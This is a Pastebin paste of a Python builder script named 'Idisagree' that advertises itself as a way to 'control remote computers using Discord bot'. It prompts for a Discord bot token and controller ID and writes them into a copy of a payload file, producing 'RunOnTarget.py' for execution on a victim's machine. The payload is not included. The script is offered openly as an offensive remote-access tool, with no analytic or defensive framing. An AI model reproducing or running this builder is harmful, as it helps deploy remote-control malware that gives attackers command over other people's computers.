Advertisement
FlyFar

Idisagree.py

Dec 3rd, 2023
656
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 3.40 KB | Cybersecurity | 0 0
  1. #       Idisagree
  2. #     by: UNDEADSEC
  3. #
  4. ###########################
  5. from __future__ import print_function
  6. from os import system
  7. RED, CYAN, GREEN, END = '\033[91m', '\033[36m', '\033[1;32m', '\033[0m'
  8.  
  9. def ascii():
  10.     system('clear')
  11.     print('''
  12. {2}  (\____/){2}-{1} UNDEADSEC {2}|{1} t.me/UndeadSec {2}|{1} youtube.com/c/UndeadSec {2}- BRAZIL
  13. {2}   (_oo_)       {2}██{0}      ██ ██ ██████ ██████ ██████      ██████ ██████{1}
  14. {2}     (O)        {2}██{0}      ██    ██         ██ ██     ██   ██  ██ ██  ██{1}
  15. {2}   __||__    \) {2}██{0}  ██████ ██ ██████ ██████ ██ ███ ████ ██████ ██████{1}
  16. {2}[]/______\[] /  {2}██{0}  ██  ██ ██     ██ ██  ██ ██  ██ ██   ██     ██{1}
  17. {2}/ \______/ \/   {2}██{0}  ██████ ██ ██████ ██████ ██████ ██   ██████ ██████{1}
  18. {2}    /__\             {2}CONTROL REMOTE COMPUTERS USING DISCORD BOT{1} v1.0
  19.                                            Stay tuned on Twitter: @UndeadSec
  20. {3}[{1}?{3}]{1} IT'S YOUR FIRST TIME HERE?
  21. {3}:{1} FOLLOW THESE STEPS:
  22.  
  23. {3}>{1} CREATE AN ACCOUNT AT DISCORD AND GET YOUR DISCORD ID. EXAMPLE: TEST#0000
  24. ({2}https://discordapp.com/{1})
  25. {3}>{1} CREATE A DISCORD SERVER
  26. ({2}https://discordapp.com/{1})
  27. {3}>{1} CREATE AN DISCORD APP AND MAKE YOUR APP INTO A BOT
  28. ({2}https://discordapp.com/developers/applications/me#top{1})
  29. {3}>{1} GET THE BOT TOKEN
  30. ({2}https://discordapp.com/developers/applications/me#top{1})
  31. {3}>{1} ADD BOT TO YOUR DISCORD SERVER
  32. ({2}Complete tutorial: https://github.com/UndeadSec/Idisagree{1})'''.format(RED, END, CYAN, GREEN))
  33.  
  34. def end():
  35.     system('clear')
  36.     print('''
  37.            {3}I{1}
  38.       ;     /        ,--.    
  39.       [{3}"{1}]   [{3}"{1}]  ,<  |__{3}**{1}|    
  40.      /[_]\ [~]\/    |//  |    
  41.       ] [   OOO      /o|__|
  42.              {3}DISAGREE{1}
  43.  
  44. {1}[ {0}Watch us on YouTube:{1} https://youtube.com/c/UndeadSec ]
  45. [ {0}Follow me on Twitter:{1} https://twitter.com/A1S0N_ ]
  46. [ {0}Contribute on Github:{1} https://github.com/UndeadSec/Idisagree ]
  47. [ {0}Join our Telegram Group(Portuguese):{1} https://t.me/UndeadSec ]\n'''.format(GREEN, END, CYAN, RED))
  48.  
  49. def generate(botToken, botMaster):
  50.     info = 'botToken = ' + '\'' + botToken + '\'' +'\nbotMaster = ' + '\'' + botMaster + '\''
  51.     with open('payload.py','r') as contents:
  52.         save = contents.read()
  53.     with open('RunOnTarget.py','w') as contents:
  54.         contents.write(info)
  55.     with open('RunOnTarget.py','a') as contents:
  56.         contents.write(save)
  57.     return('{0}[{1}*{0}]{1} Saved as {2}RunOnTarget.py{1}'.format(GREEN, END, RED))
  58.  
  59. def config():  
  60.     botToken = input('\n[{0}I{1}disagree{2}] BOT TOKEN: '.format(CYAN, RED, END))
  61.     botMaster = input('[{0}I{1}disagree{2}] BOT MASTER: '.format(CYAN, RED, END))
  62.     print('\n[~] Configuration:\n [BOT TOKEN] =' + botToken + '\n [BOT MASTER] = ' + botMaster)
  63.     confirm = input('\nConfirm ? (y/n) : ')
  64.     if confirm.upper() == 'Y':
  65.         print(generate(botToken, botMaster))
  66.     else:
  67.         config()
  68.  
  69. def main():
  70.     ascii()
  71.     config()
  72.  
  73. if __name__ == "__main__":
  74.     try:
  75.         main()
  76.     except KeyboardInterrupt:
  77.         end()
  78.         exit(0)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement